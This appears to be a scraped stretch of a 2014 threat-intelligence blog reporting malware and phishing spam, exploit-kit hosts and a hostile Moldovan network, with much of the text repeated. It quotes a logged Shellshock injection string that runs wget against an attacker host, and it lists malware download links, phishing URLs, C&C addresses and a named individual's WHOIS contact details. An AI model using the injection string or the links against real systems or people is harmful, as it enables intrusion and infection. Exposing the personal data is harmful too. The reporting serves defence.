It looks like the Nuclear exploit kit is active on 178.79.182.106 (Linode, UK), using hijacked subdomains of legitimate domains using AFRAID.ORG nameservers. I can fee the following sites active on that IP:
fuhloizle.tryzub-it.co.uk
fuhloizle.pgaof39.com
fuhloizle.cusssa.org
"fuhloizle" is a pretty distinctive search string to look for in your logs. It looks like the bad sites might be down at the moment (or the kit is hardened against analysis), but blocking this IP address as a precaution might be a good idea.
Thursday 9 October 2014
Nuclear EK active on 178.79.182.106
Labels:
Linode,
Malware,
Nuclear EK,
Viruses
Wednesday 8 October 2014
Malware spam: Lloyds "Important - Commercial Documents" and NatWest "You have a new Secure Message"
There's a familiar pattern to this malware-laden spam, but with an updated payload from before:
The link in the email runs through a script which will attempt to download a ZIP file pdf-to-view_864129_pdf.zip onto the target machine which in turn contains a malicious executable pdf-to-view_864129_pdf.exe which has a VirusTotal detection rate of 6/53.
The Malwr report indicates that the malware phones home to the following locations which are worth blocking, especially 94.75.233.13 (Leaseweb, Netherlands) which looks like a C&C server.
94.75.233.13:37400/0810uk1/HOME/0/51-SP3/0/
94.75.233.13:37400/0810uk1/HOME/1/0/0/
94.75.233.13:37400/0810uk1/HOME/41/5/1/
cemotrans.com/seo/0810uk1.soa
Lloyds Commercial Bank: "Important - Commercial Documents"
From: Lloyds Commercial Bank [secure@lloydsbank.com]
Date: 8 October 2014 11:09
Subject: Important - Commercial Documents
Important account documents
Reference: C437
Case number: 66324010
Please review BACs documents.
Click link below, download and open document. (PDF Adobe file)
----------------------
http://01silex.com/dropbox/document.php
-----------------------
Please note that the Terms and Conditions available below are the Bank's most recently issued versions. Please bear in mind that earlier versions of these Terms and Conditions may apply to your products, depending on when you signed up to the relevant product or when you were last advised of any changes to your Terms and Conditions. If you have any questions regarding which version of the Terms and Conditions apply to your products, please contact your Relationship Manager. .
Yours faithfully
James Vance
Senior Manager, Lloyds Commercial Banking
Calls may be monitored or recorded in case we need to check we have carried out your instructions correctly and to help improve our quality of service.
Please remember we guarantee the security of messages sent by email.
NatWest: "You have a new Secure Message - file-2620"
From: NatWest [secure.message@natwest.com]
Date: 8 October 2014 10:29
Subject: You have a new Secure Message - file-2620
You have received a encrypted message from NatWest Customer Support
In order to view the attachment please open it using your email client ( Microsoft Outlook, Mozilla Thunderbird, Lotus )
Please download your ecnrypted message at:
http://cookierunid.com/dropbox/document.php
(Google Disk Drive is a file hosting service operated by Google, Inc.)
If you have concerns about the validity of this message, please contact the sender directly. For questions please contact the NatWest Bank Secure Email Help Desk at 0131 556 3068.
The link in the email runs through a script which will attempt to download a ZIP file pdf-to-view_864129_pdf.zip onto the target machine which in turn contains a malicious executable pdf-to-view_864129_pdf.exe which has a VirusTotal detection rate of 6/53.
The Malwr report indicates that the malware phones home to the following locations which are worth blocking, especially 94.75.233.13 (Leaseweb, Netherlands) which looks like a C&C server.
94.75.233.13:37400/0810uk1/HOME/0/51-SP3/0/
94.75.233.13:37400/0810uk1/HOME/1/0/0/
94.75.233.13:37400/0810uk1/HOME/41/5/1/
cemotrans.com/seo/0810uk1.soa
Tuesday 7 October 2014
DHL-themed phish goes to a lot of effort and then spoils it with Comic Sans
This DHL-themed phish is trying to harvest email credentials, but instead of just spamming out a link, it spams out a PDF file with the link embedded in it.
Look closely at the blurb at the bottom and it confuses DHL with UPS, but who reads that? Attached is a non-malicious PDF file DHL (1).pdf which contains a link to the phishing site.
So far, so professional. And a neat trick to use PDF files in this way as a lot of spam filters and anti-phishing tools won't spot it. The link in the PDF goes to 37.61.235.199/~zantest/doc1/dhlweb0002/webshipping_dhl_com_members_modulekey_displaycountrylist_id5482210003804452/DHL/index.htm where it has a rather less professional looking webpage that is phishing for general email addresses rather than DHL credentials.
With the grotty graphics and injudicious use of Comic Sans, it's hard to see how this would fool anyone into turning over their credentials.. but presumably they manage to harvest enough usernames and passwords to make it worthwhile.
Date: 6 October 2014 23:32
Subject: Package has been sent.
Your shipment(s) listed below is scheduled for delivery on Thursday next week.
Scheduled Delivery Date: Thursday, 10/09/2014
Shipment 2
Shipper: ADIHASAN GROUP
Kindly please see attached file for shipment /delivery details and tracking procedure. You can also request a delivery change (e.g. reschedule or reroute) from the tracking detail.
Approximate Delivery Time: between 3:00 PM and 7:00 PM
DHL Service: DHL 2nd Day Air
We are pleased to provide you with delivery that fits your life.
© 2014 Parcel Service of the World. DHL, the DHL brandmark, and the color brown are trademarks of United Parcel Service of America, Inc. All rights reserved.
All trademarks, trade names, or service marks that appear in connection with UPS's services are the property of their respective owners.
For more information on DHL's privacy practices, refer to the DHL Privacy Notice.
Please do not reply directly to this e-mail. DHL will not receive any reply message.
For questions or comments, visit Contact DHL.
This communication contains proprietary information and may be confidential. If you are not the intended recipient, the reading, copying, disclosure or other use of the contents of this e-mail is strictly prohibited and you are instructed to please delete this e-mail immediately.
Privacy Notice
DHL My Choice Service Terms
Contact DHL
Look closely at the blurb at the bottom and it confuses DHL with UPS, but who reads that? Attached is a non-malicious PDF file DHL (1).pdf which contains a link to the phishing site.
So far, so professional. And a neat trick to use PDF files in this way as a lot of spam filters and anti-phishing tools won't spot it. The link in the PDF goes to 37.61.235.199/~zantest/doc1/dhlweb0002/webshipping_dhl_com_members_modulekey_displaycountrylist_id5482210003804452/DHL/index.htm where it has a rather less professional looking webpage that is phishing for general email addresses rather than DHL credentials.
With the grotty graphics and injudicious use of Comic Sans, it's hard to see how this would fool anyone into turning over their credentials.. but presumably they manage to harvest enough usernames and passwords to make it worthwhile.
Friday 3 October 2014
"Thanks for shopping with us today!" malspam spreads via Dropbox
This spam email leads to malware hosted on Dropbox:
The download file is Payment Details_52375.zip containing a malicious executable PAYMENT DETAILS.PDF .scr_56453.exe which has a VirusTotal detection rate of 5/55. At the moment, automated analysis tools [1] [2] [3] are inconclusive as to what it does.
UPDATE: it is also being distributed via
https://www.dropbox.com/s/9an3ggp98xu7ql5/Transaction_85523.zip?dl=1
https://www.dropbox.com/s/8uoheamseo98nse/Information_J90Z4.zip?dl=1
https://www.dropbox.com/s/fvogsazezmv00hw/Transaction_G287O.zip?dl=1
https://www.dropbox.com/s/42b7binqmk8auu9/Payment_Details_A0869.zip?dl=1
https://www.dropbox.com/s/okag3y2qtg12vg7/Payment_Details_R435C.zip?dl=1
From: pghaa@pghaa.orgIn this case the download location is https://www.dropbox.com/s/7n4ib0ysqnzr4un/Payment%20Details_52375.zip?dl=1 although it is likely that there are others.
To: victim@victimdomain.com
Date: 3 October 2014 11:43
Subject: victim@victimdomain.com
Thanks for shopping with us today! Your purchase will be processed shortly.
ORDER DETAILS
Purchase Number: CTV188614791
Purchase Date: 7:38 2-Oct-2014
Customer Email: victim@victimdomain.com
Amount: 4580 US Dollars
Open your payment details
Please click the link provided above to get more details about your order.
The download file is Payment Details_52375.zip containing a malicious executable PAYMENT DETAILS.PDF .scr_56453.exe which has a VirusTotal detection rate of 5/55. At the moment, automated analysis tools [1] [2] [3] are inconclusive as to what it does.
UPDATE: it is also being distributed via
https://www.dropbox.com/s/9an3ggp98xu7ql5/Transaction_85523.zip?dl=1
https://www.dropbox.com/s/8uoheamseo98nse/Information_J90Z4.zip?dl=1
https://www.dropbox.com/s/fvogsazezmv00hw/Transaction_G287O.zip?dl=1
https://www.dropbox.com/s/42b7binqmk8auu9/Payment_Details_A0869.zip?dl=1
https://www.dropbox.com/s/okag3y2qtg12vg7/Payment_Details_R435C.zip?dl=1
Thursday 2 October 2014
Sky doesn't understand "opting out" of marketing emails
Are you making the most of your Sky TV?
We’re checking our records and can see that you’re not currently opted in to get offers by email, so there are bound to be things you’re not hearing about, like:
- exclusive money-saving offers on fantastic Sky products and services
- the chance to trial our most popular products and services totally free
We’ll also donate £2 to Sky Rainforest Rescue, our partnership with WWF, for every customer that opts in – up to £10,000. Sky Rainforest Rescue is helping to save 1 billion trees in the Amazon. So you’ll be making a real difference to the rainforest, which is home to an astonishing one in 10 of all the wild species on Earth.
It only takes a minute, so opt in today and get more out of being a Sky customer.
Sky seem aghast that I'm not interested in a stream of marketing emails for products which I am probably not interested in. Which is why I opted out of having them. I don't want to be nagged about opting out - that's not honouring the opt out is it? In other words.. this is spam.
Just in case Sky ever ends up reading it, I will put it in terms that you might understand..
Wednesday 1 October 2014
uktservices.com "Booking Cancellation" spam / 37.235.56.121
I just had a mass of these purporting to be from uktservices.com ("UK Travel Services"), but in fact it is a forgery and does not come from them at all - they are not responsible for sending the spam and their systems have not been compromised.
The links in the emails I have seen so far go to:
[donotclick]vinafruit.com/ongo.html
[donotclick]famdebaere.eu/ongo.html
[donotclick]ebook-55.ebook-55.com/ongo.html
[donotclick]farahenterprises.com/ongo.html
In all cases, those pages forward to a malicious page at:
[donotclick]37.235.56.121:8080/njslfxqqw9
The IP of 37.235.56.121 belongs to EDIS GmbH in Austria, and I suspect it has been hacked through an insecure Joomla installation.
I haven't been able to identify which exploit kit it is as it it has been hardened against analysis, but you can guarantee that this is malicious in some way or another.
From: email@uktservices.comAll the emails are somewhat mangled, but the first link in the email (not the uktservices.com link) goes to what appears to be an exploit kit:
Date: 1 October 2014 14:01
Subject: Booking Cancellation
Hello.
Your booking at 13:15 on 1st Oct 2014 has been Cancelled.
Here is a link to your updated bookings view:
< href="[redacted] ">http://www.uktservices.com/system/drivers/jobs/51/ 66c3a53705f1ea2c5b8a11c94c29c6 328599a0fc
The links in the emails I have seen so far go to:
[donotclick]vinafruit.com/ongo.html
[donotclick]famdebaere.eu/ongo.html
[donotclick]ebook-55.ebook-55.com/ongo.html
[donotclick]farahenterprises.com/ongo.html
In all cases, those pages forward to a malicious page at:
[donotclick]37.235.56.121:8080/njslfxqqw9
The IP of 37.235.56.121 belongs to EDIS GmbH in Austria, and I suspect it has been hacked through an insecure Joomla installation.
I haven't been able to identify which exploit kit it is as it it has been hardened against analysis, but you can guarantee that this is malicious in some way or another.
Something evil on 87.118.127.230
Quite what exploit kit this is I cannot determine, but there's something evil on 87.118.127.230 (Keyweb, Germany) which is using hijacked GoDaddy-registered subdomains to distribute crap. It's definitely worth blocking this IP. The source looks like some sort of malvertising, but I have incomplete data.
The domains I have seen being abused are:
aacregistry.org
agostjoe.com
apprizse.com
association-connect.com
barnesvillechiro.com
bwclinic.com
chiro-connect.com
ctkblockparty.org
holyhoops.net
josephrobidoux.com
lifeatctk.org
mca-connect.com
midwestartists.org
missouritheater.com
missouritheater.net
missouritheater.org
missouritheatre.com
missouritheatre.net
missouritheatre.org
moveonedegree.com
mvsummerhoops.com
premiermortgagenetwork.info
rapidpricecomparison.com
robidouxrow.com
smallbiz-connect.com
staffing-connect.com
stjoarts.org
stjoearts.com
trailswest.org
tumainiag.com
tumainiag.org
vpmspecialists.com
A list of all the subdomains I have seen can be found here [pastebin]
The domains I have seen being abused are:
aacregistry.org
agostjoe.com
apprizse.com
association-connect.com
barnesvillechiro.com
bwclinic.com
chiro-connect.com
ctkblockparty.org
holyhoops.net
josephrobidoux.com
lifeatctk.org
mca-connect.com
midwestartists.org
missouritheater.com
missouritheater.net
missouritheater.org
missouritheatre.com
missouritheatre.net
missouritheatre.org
moveonedegree.com
mvsummerhoops.com
premiermortgagenetwork.info
rapidpricecomparison.com
robidouxrow.com
smallbiz-connect.com
staffing-connect.com
stjoarts.org
stjoearts.com
trailswest.org
tumainiag.com
tumainiag.org
vpmspecialists.com
A list of all the subdomains I have seen can be found here [pastebin]
"Homicide Suspect - important" spam
Ohmigod, the New York City police have finally tracked me down for eviscerating that spammer in Times Square.
Perhaps the biggest anomaly is the file that is downloaded, a ZIP file called file-viewonly7213_pdf.zip which contains an executable file-viewonly7213_pdf.scr which is (as you might guess) malicious with a VirusTotal detection rate of 2/55. The Anubis report shows that the malware phones home to santace.com which is probably worth blocking or monitoring. Other analyses are pending.
I've also seen the same payload promoted through a "You've received a new fax" spam, and no doubt there will be others during the course of the day.
From: ALERT@police.uk [ALERT@police-uk.com]Weirdly, the message comes from a police.uk email address and the link goes to a driving school in Australia. And it comes from 63.234.220.114 which is an IP address in Kansas City.
Date: 1 October 2014 08:49
Subject: Homicide Suspect - important
Bulletin Headline: HOMICIDE SUSPECT
Sending Agency: New York City Police
Sending Location: NY - New York - New York City Police
Bulletin Case#: 14-49627
Bulletin Author: BARILLAS #1264
Sending User #: 56521
APBnet Version: 852065
The bulletin is a pdf file. To download please follow the link below (Google Disk Drive service):
http://lppdrivingschool.id.au/ib1/cc141713
The Adobe Reader (from Adobe.com) will display and print the bulletin best.
You can Not reply to the bulletin by clicking on the Reply button in your email software.
Perhaps the biggest anomaly is the file that is downloaded, a ZIP file called file-viewonly7213_pdf.zip which contains an executable file-viewonly7213_pdf.scr which is (as you might guess) malicious with a VirusTotal detection rate of 2/55. The Anubis report shows that the malware phones home to santace.com which is probably worth blocking or monitoring. Other analyses are pending.
I've also seen the same payload promoted through a "You've received a new fax" spam, and no doubt there will be others during the course of the day.
Tuesday 30 September 2014
Alzheimer's Association (act.alz.org) abused by spammers
The Alzheimer's Association in the US (alz.org) operate some sort of tell-a-friend system which is apparently easily abused by spammers.
Is this actually from Marbu Contracting? Well, they have been around for 35 years and have their own website at marbucontracting.co and receive emails at the domain marbu-contracting.com, so it is unlikely that they would either resort to using a Hotmail account or sending spam in this way.
So is it a scam? It could be a dangerous one as some Qatari firms have been accused of running slave labour camps, so there's a good chance that this gig isn't what it is supposed to be.
But either the Alzheimer's Association or their service provider Convio Inc must bear some of the responsibility for creating a system that can be abused by spammers in this way. Although their site is meant to restrict sending these messages to ten addresses at a time, presumably the bad guys are running a script or have found some other way to bulk email using alz.org.
In conclusion.. ignore this bogus job offer. And remember to secure this sort of "tell a friend" functionality on your own servers.
From: Marbu Contracting Company LLC. [info@alz.org]The originating IP is 66.45.103.69 which closely matches the IP of 66.45.103.78 for act.alz.org mentioned in the email, so the email is genuinely coming via the Alzheimer's Association website from some scumbag spammers.
Reply-To: "Marbu Contracting Company LLC." [marbu.constructions.ah@hotmail.com]
Date: 30 September 2014 19:33
Subject: Check out the Alzheimer's Association website!
Marbu Contracting Company LLC.
No.48,1st Floor,Kaamco
Building, Suhaim Bin Hamad
Street, Bin Mahmoud Qatar,
Tele:44204739.Fax:44289185
E-Mail:(marbu.constructions.ah@hotmail.com)
Marbu Contracting Company LLC. wish to use this medium to announce
that vacancies is now on for Qualified building contractors,
Structural Engineers/Electrical Engineer//Piping/Mechanical
Engineers/GIS/Land Surveyors,NDT Engineer, Civil Engineers, Project
Director,ETC. Candidates should have a Relevant degree B.Eng, BSc.
Eng or B racersTech,
interested contractor or candidate should apply with full resume and
details of jobs completed or ongoing for perusal.
Send You reply to:(marbu.constructions.ah@hotmail.com)
Regard's
Mr.Ahmed Haasen,
Human Resources Manager
I urge you to join me and visit the Alzheimer's Association today!
If the text above does not appear as a clickable link, you can visit the web address:
http://act.alz.org/site/TellAFriend?s_oo=F79cLz0Fs6dcX6iQ5Lb3TA
If you no longer wish to receive email messages sent from your friends on behalf of this organization, please click here or paste this URL into your browser: http://act.alz.org/site/TellFriendOpt?action=optout&toe=a136b421fe2a9b594f68767c21c537f6382420c25dbc7e041ccd4c50a5c00593
Is this actually from Marbu Contracting? Well, they have been around for 35 years and have their own website at marbucontracting.co and receive emails at the domain marbu-contracting.com, so it is unlikely that they would either resort to using a Hotmail account or sending spam in this way.
So is it a scam? It could be a dangerous one as some Qatari firms have been accused of running slave labour camps, so there's a good chance that this gig isn't what it is supposed to be.
But either the Alzheimer's Association or their service provider Convio Inc must bear some of the responsibility for creating a system that can be abused by spammers in this way. Although their site is meant to restrict sending these messages to ten addresses at a time, presumably the bad guys are running a script or have found some other way to bulk email using alz.org.
In conclusion.. ignore this bogus job offer. And remember to secure this sort of "tell a friend" functionality on your own servers.
Malware spam: NatWest "You have a new Secure Message" / "You've received a new fax"
The daily mixed spam run has just started again, these two samples seen so far this morning:
UPDATE: the ThreatTrack report [pdf] shows that the malware attempts to communicate with the following locations:
188.165.198.52/3009uk1/NODE01/0/51-SP3/0/
188.165.198.52/3009uk1/NODE01/1/0/0/
188.165.198.52 is (unsurprisingly) allocated to OVH in France and is definitely worth blocking.
The link in the email goes through a script to ensure that you are using a Windows PC and then downloads a file document3009.zip which contains a malicious executable document3009.scr which has a VirusTotal detection rate of 3/54. The Comodo CAMAS report and Anubis report are rather inconclusive.NatWest: "You have a new Secure Message"
From: NatWest [secure.message@natwest.com]
Date: 30 September 2014 09:58
Subject: You have a new Secure Message - file-3800
You have received a encrypted message from NatWest Customer Support
In order to view the attachment please open it using your email client ( Microsoft Outlook, Mozilla Thunderbird, Lotus )
Please download your ecnrypted message at:
http://binuli.ge/docs/document0679
(Google Disk Drive is a file hosting service operated by Google, Inc.)
If you have concerns about the validity of this message, please contact the sender directly. For questions please contact the NatWest Bank Secure Email Help Desk at 0131 556 6002.
"You've received a new fax"
From: Fax [fax@victimdomain.com]
Date: 30 September 2014 09:57
Subject: You've received a new fax
New fax at SCAN4148711 from EPSON by https://victimdomain.com
Scan date: Tue, 30 Sep 2014 14:27:24 +0530
Number of pages: 2
Resolution: 400x400 DPI
You can secure download your fax message at:
http://www.brianhomesinc.com/docs/document5928
(Google Disk Drive is a file hosting service operated by Google, Inc.)
UPDATE: the ThreatTrack report [pdf] shows that the malware attempts to communicate with the following locations:
188.165.198.52/3009uk1/NODE01/0/51-SP3/0/
188.165.198.52/3009uk1/NODE01/1/0/0/
188.165.198.52 is (unsurprisingly) allocated to OVH in France and is definitely worth blocking.
Monday 29 September 2014
Malware spam: "Lloyds Commercial Bank" / "HSBC Bank UK"
Two different banking spams this morning, leading to the same malware,.
The link in the email goes through a script and then downloads a file document_8641_29092014_pdf.scr (this time without a ZIP wrapper) which has a VirusTotal detection rate of just 1/55. The Anubis report shows that the malware attempts to phone home to cuscorock.com which is probably a good thing to block or monitor.Lloyds Commercial Bank "Important - Commercial Documents"
From: Lloyds Commercial Bank [secure@lloydsbank.com]
Date: 29 September 2014 11:03
Subject: Important - Commercial Documents
Important account documents
Reference: C947
Case number: 18868193
Please review BACs documents.
Click link below, download and open document. (PDF Adobe file)
----------------------
http://www.ticklestootsies.com/dropbox-documents/document_8641_29092014.php
-----------------------
Please note that the Terms and Conditions available below are the Bank's most recently issued versions. Please bear in mind that earlier versions of these Terms and Conditions may apply to your products, depending on when you signed up to the relevant product or when you were last advised of any changes to your Terms and Conditions. If you have any questions regarding which version of the Terms and Conditions apply to your products, please contact your Relationship Manager. .
Yours faithfully
James Vance
Senior Manager, Lloyds Commercial Banking
Calls may be monitored or recorded in case we need to check we have carried out your instructions correctly and to help improve our quality of service.
Please remember we guarantee the security of messages sent by email.
HSBC Bank UK "Payment Advice Issued"
From: HSBC Bank UK
Date: 29 September 2014 11:42
Subject: Payment Advice Issued
Your payment advice is issued at the request of our customer. The advice is for your reference only.
Please download your payment advice at http://sabiacommunications.com/dropbox-documents/document_8641_29092014.php
Yours faithfully,
Global Payments and Cash Management
*******************************************************************************
This is an auto-generated email, please DO NOT REPLY. Any replies to this email will be disregarded.
Sunday 28 September 2014
This is why I don't use Network Solutions
I recently acquired a domain name which ended up being registered at Network Solution, not my usual registrar.. so I then wanted to move that domain from NetSol to my main domain account. Now, do to this you need an authorisation code to transfer out.. which I duly requested.
So after a few days of waiting, I get the following email from Network Solutions.
Let's look more closely at that authorization code. Yeah, normally that's the sort of thing that you should never share.. but:
The authorisation code is frigging blank. This is meant to be an automated process.. how can it be blank? Or has someone intervened manually?
Oh wait, I didn't read this line in the email:
UPDATE 2014-10-03: I raised a ticket which was acknowledged.. and then ignored completely. NetSol are breaking ICANN regulations by not providing the authorisation code in a timely manner.
UPDATE 2014-10-09: After several support tickets and chasing through Twitter I finally got the transfer code.. after two weeks! This clearly breaches the specified five calendar days to do the job.
Just a (hopefully) final note. If you do find that a registrar is being deliberately obstructive about the transfer (or they transferred a domain without your permission) you can make a complaint to ICANN here.
So after a few days of waiting, I get the following email from Network Solutions.
Let's look more closely at that authorization code. Yeah, normally that's the sort of thing that you should never share.. but:
The authorisation code is frigging blank. This is meant to be an automated process.. how can it be blank? Or has someone intervened manually?
Oh wait, I didn't read this line in the email:
If you are planning to transfer your domain to another registrar, we would like to do whatever it takes to keep your business - please let us know how we can improve our service to you.Presumably this a way of doing whatever it takes. I did even drill down into the HTML source to make sure it wasn't my mail client screwing up. It seems that I'm not the only person who has had problems transferring their domain out according to this story.
UPDATE 2014-10-03: I raised a ticket which was acknowledged.. and then ignored completely. NetSol are breaking ICANN regulations by not providing the authorisation code in a timely manner.
UPDATE 2014-10-09: After several support tickets and chasing through Twitter I finally got the transfer code.. after two weeks! This clearly breaches the specified five calendar days to do the job.
Just a (hopefully) final note. If you do find that a registrar is being deliberately obstructive about the transfer (or they transferred a domain without your permission) you can make a complaint to ICANN here.
Evil network: Shellshock and MangoHost (mangohost.net) / 83.166.234.0/24
I came across this particular sewer while looking in my logs for Shellshock access attempts yesterday. I noticed that some cheeky b--stard was probing my server at attempting to WGET back to their own network to enumerate vulnerable hosts.
inetnum: 83.166.234.0 - 83.166.234.255
netname: MangoHost-Net
descr: S.R.L. MangoHost Network
descr: str.T.Vladimirescu 1/1, 94 Chisinau, Moldova
country: MD
org: ORG-SMN4-RIPE
admin-c: VL6476-RIPE
tech-c: VL6476-RIPE
status: ASSIGNED PA
mnt-by: RIM2000-MNT
notify: noc@rim2000.ru
changed: lukina@rim2000.ru 20140318
changed: lukina@rim2000.ru 20140325
source: RIPE
organisation: ORG-SMN4-RIPE
org-name: S.R.L. MangoHost Network
org-type: OTHER
address: str.T.Vladimirescu 1/1, 94 Chisinau, Moldova
e-mail: mangohostnetwork@gmail.com
abuse-c: AR18923-RIPE
abuse-mailbox: mangohostnetwork@gmail.com
mnt-ref: CLOUDATAMD-MNT
mnt-by: CLOUDATAMD-MNT
mnt-ref: RIM2000-MNT
changed: iuraqq@gmail.com 20140314
source: RIPE
person: Victor Letkovski
address: T. Vladimirescu str 1/1 2024 Chisinau
phone: +373 79 342393
nic-hdl: VL6476-RIPE
mnt-by: BSB-SERVICE-MNT
changed: ripe@plusserver.de 20130520
source: RIPE
% Information related to '83.166.234.0/24AS200019'
route: 83.166.234.0/24
descr: S.R.L. MangoHost Network
origin: AS200019
mnt-by: RIM2000-MNT
changed: lukina@rim2000.ru 20140319
source: RIPE
MangoHost claims to be in Moldova, but almost everything to do with them is in Russian, indicating perhaps that whoever runs this is part of the large Russian ethnic minority in Moldova. MangoHost is run by one Victor Letkovski (виктор летковский) who lives in Chisinau.
Until the past few days, MangoHost was hosting the ransomware sites listed here [pastebin]. Paste customers include the infamous Darkode forum back in June, and indeed it still hosts jab.darkode.com, whatever that may be (you can guarantee it is nothing good).
Currently hosted domains include a collection of fake browser plugins, some malvertising sites, some porn, spam sites, hacker resources, ransomware domains and what might appear to be some fake Russian law firms. A list of everything that I can currently see in this /24 is:
for-your.biz
spr.for-your.biz
www.portw.org
1cpred.org
md1.vpn-service.us
jab.darkode.com
cappellina.com
ieplugins.net
ie-plugin.com
ie-addon.com
flanbase.org
porndays.org
allestic.org
shreqads.org
cpmjunction.org
indexcpm.org
friscoserve43.com
secsoncpm.com
clickcenter98.com
clickfunder81.com
adcountservices.com
ad.serverflamerstf.com
sfecpm.com
dialaclick.com
consultant-fond.ru
promo-consultin.ru
fond-consult.ru
rusinconsult.ru
yugconsalting.ru
partnersconsult.ru
buhsupport.biz
s2.futurevideo.su
s3.futurevideo.su
s4.futurevideo.su
tedaciokero.in
security-05znsa.pw
security-police5qnsa.pw
alert24world4xi.us
security-d07nsa.co.uk
security-g02nsa.co.uk
security-d07nsa.us
security-alert-nsacr.us
kubikrubik.me
ns1.kubikrubik.me
ns2.kubikrubik.me
ns2.kubikrubik.me
babulya.biz
ad.evhomebusiness.com
ad.emanuelecontractor.com
ad.theglamzsophisticate.com
ad.icanknittoo.info
smtp.gschultz.com
bounce.gschultz.com
smtp.agoodline.com
bounce.agoodline.com
smtp.ashlandmo.com
bounce.ashlandmo.com
smtp.circuitciy.com
bounce.circuitciy.com
ns2.hnnoceacecs.ru
ns2.jnojgnsecas.ru
ns2.jincoeacsc.ru
ns2.jnigunsecs.ru
zaconhelp.ru
pro-yurist.ru
yuristvsem.ru
zakon-vsem.ru
advocat4all.ru
pro-advocat.ru
yurist-info.ru
yuristzakon.ru
zakon-prost.ru
advocat-vsem.ru
advokat-prof.ru
jurist-otvet.ru
power-yurist.ru
pravomagistr.ru
zakon-yurist.ru
zakon-znatok.ru
zakonmagistr.ru
jurist-zabota.ru
yurist-vopros.ru
yurist-znatok.ru
advocat-jurist.ru
advocat-zakoni.ru
advokatura-pro.ru
pravoved-zakon.ru
pravovoiyurist.ru
yurist-protect.ru
yuristprozakon.ru
zakonhelponline.ru
pravoved-consult.ru
pravovoi-consultant.ru
analofday.com
www.analofday.com
ad.mobiplaystore.us
ad.glenlevit.us
ad.rioresults.us
ad.seojunctionaire.us
ad.directsign.us
ad.dipad.biz
ad.truestream.biz
ad.adrealmedia.biz
freelivepornwebcams.com
I would strongly recommend blocking all traffic to and from 83.166.234.0/24 if you can do it.
dynamoo.com:80 83.166.234.133 - - [27/Sep/2014:03:08:37 +0100] "GET / HTTP/1.0" 200 11044 "-" "() { :;}; /bin/bash -c \"wget -q -O /dev/null http://ad.dipad.biz/test/http://dynamoo.com/\""ad.dipaz.biz is hosted on 83.166.234.186, so pretty close to the probing IP of 83.166.234.133 which made me suspicious of the whole range, registered to:
inetnum: 83.166.234.0 - 83.166.234.255
netname: MangoHost-Net
descr: S.R.L. MangoHost Network
descr: str.T.Vladimirescu 1/1, 94 Chisinau, Moldova
country: MD
org: ORG-SMN4-RIPE
admin-c: VL6476-RIPE
tech-c: VL6476-RIPE
status: ASSIGNED PA
mnt-by: RIM2000-MNT
notify: noc@rim2000.ru
changed: lukina@rim2000.ru 20140318
changed: lukina@rim2000.ru 20140325
source: RIPE
organisation: ORG-SMN4-RIPE
org-name: S.R.L. MangoHost Network
org-type: OTHER
address: str.T.Vladimirescu 1/1, 94 Chisinau, Moldova
e-mail: mangohostnetwork@gmail.com
abuse-c: AR18923-RIPE
abuse-mailbox: mangohostnetwork@gmail.com
mnt-ref: CLOUDATAMD-MNT
mnt-by: CLOUDATAMD-MNT
mnt-ref: RIM2000-MNT
changed: iuraqq@gmail.com 20140314
source: RIPE
person: Victor Letkovski
address: T. Vladimirescu str 1/1 2024 Chisinau
phone: +373 79 342393
nic-hdl: VL6476-RIPE
mnt-by: BSB-SERVICE-MNT
changed: ripe@plusserver.de 20130520
source: RIPE
% Information related to '83.166.234.0/24AS200019'
route: 83.166.234.0/24
descr: S.R.L. MangoHost Network
origin: AS200019
mnt-by: RIM2000-MNT
changed: lukina@rim2000.ru 20140319
source: RIPE
MangoHost claims to be in Moldova, but almost everything to do with them is in Russian, indicating perhaps that whoever runs this is part of the large Russian ethnic minority in Moldova. MangoHost is run by one Victor Letkovski (виктор летковский) who lives in Chisinau.
Until the past few days, MangoHost was hosting the ransomware sites listed here [pastebin]. Paste customers include the infamous Darkode forum back in June, and indeed it still hosts jab.darkode.com, whatever that may be (you can guarantee it is nothing good).
Currently hosted domains include a collection of fake browser plugins, some malvertising sites, some porn, spam sites, hacker resources, ransomware domains and what might appear to be some fake Russian law firms. A list of everything that I can currently see in this /24 is:
for-your.biz
spr.for-your.biz
www.portw.org
1cpred.org
md1.vpn-service.us
jab.darkode.com
cappellina.com
ieplugins.net
ie-plugin.com
ie-addon.com
flanbase.org
porndays.org
allestic.org
shreqads.org
cpmjunction.org
indexcpm.org
friscoserve43.com
secsoncpm.com
clickcenter98.com
clickfunder81.com
adcountservices.com
ad.serverflamerstf.com
sfecpm.com
dialaclick.com
consultant-fond.ru
promo-consultin.ru
fond-consult.ru
rusinconsult.ru
yugconsalting.ru
partnersconsult.ru
buhsupport.biz
s2.futurevideo.su
s3.futurevideo.su
s4.futurevideo.su
tedaciokero.in
security-05znsa.pw
security-police5qnsa.pw
alert24world4xi.us
security-d07nsa.co.uk
security-g02nsa.co.uk
security-d07nsa.us
security-alert-nsacr.us
kubikrubik.me
ns1.kubikrubik.me
ns2.kubikrubik.me
ns2.kubikrubik.me
babulya.biz
ad.evhomebusiness.com
ad.emanuelecontractor.com
ad.theglamzsophisticate.com
ad.icanknittoo.info
smtp.gschultz.com
bounce.gschultz.com
smtp.agoodline.com
bounce.agoodline.com
smtp.ashlandmo.com
bounce.ashlandmo.com
smtp.circuitciy.com
bounce.circuitciy.com
ns2.hnnoceacecs.ru
ns2.jnojgnsecas.ru
ns2.jincoeacsc.ru
ns2.jnigunsecs.ru
zaconhelp.ru
pro-yurist.ru
yuristvsem.ru
zakon-vsem.ru
advocat4all.ru
pro-advocat.ru
yurist-info.ru
yuristzakon.ru
zakon-prost.ru
advocat-vsem.ru
advokat-prof.ru
jurist-otvet.ru
power-yurist.ru
pravomagistr.ru
zakon-yurist.ru
zakon-znatok.ru
zakonmagistr.ru
jurist-zabota.ru
yurist-vopros.ru
yurist-znatok.ru
advocat-jurist.ru
advocat-zakoni.ru
advokatura-pro.ru
pravoved-zakon.ru
pravovoiyurist.ru
yurist-protect.ru
yuristprozakon.ru
zakonhelponline.ru
pravoved-consult.ru
pravovoi-consultant.ru
analofday.com
www.analofday.com
ad.mobiplaystore.us
ad.glenlevit.us
ad.rioresults.us
ad.seojunctionaire.us
ad.directsign.us
ad.dipad.biz
ad.truestream.biz
ad.adrealmedia.biz
freelivepornwebcams.com
I would strongly recommend blocking all traffic to and from 83.166.234.0/24 if you can do it.
Labels:
Evil Network,
Moldova,
Russia
Friday 26 September 2014
Malware spam: "HMRC taxes application with reference" / "Important - BT Digital File" / RBS "Outstanding invoice"
Another bunch of spam emails, with the same payload at this earlier spam run.
The links I have seen so far in the emails are:
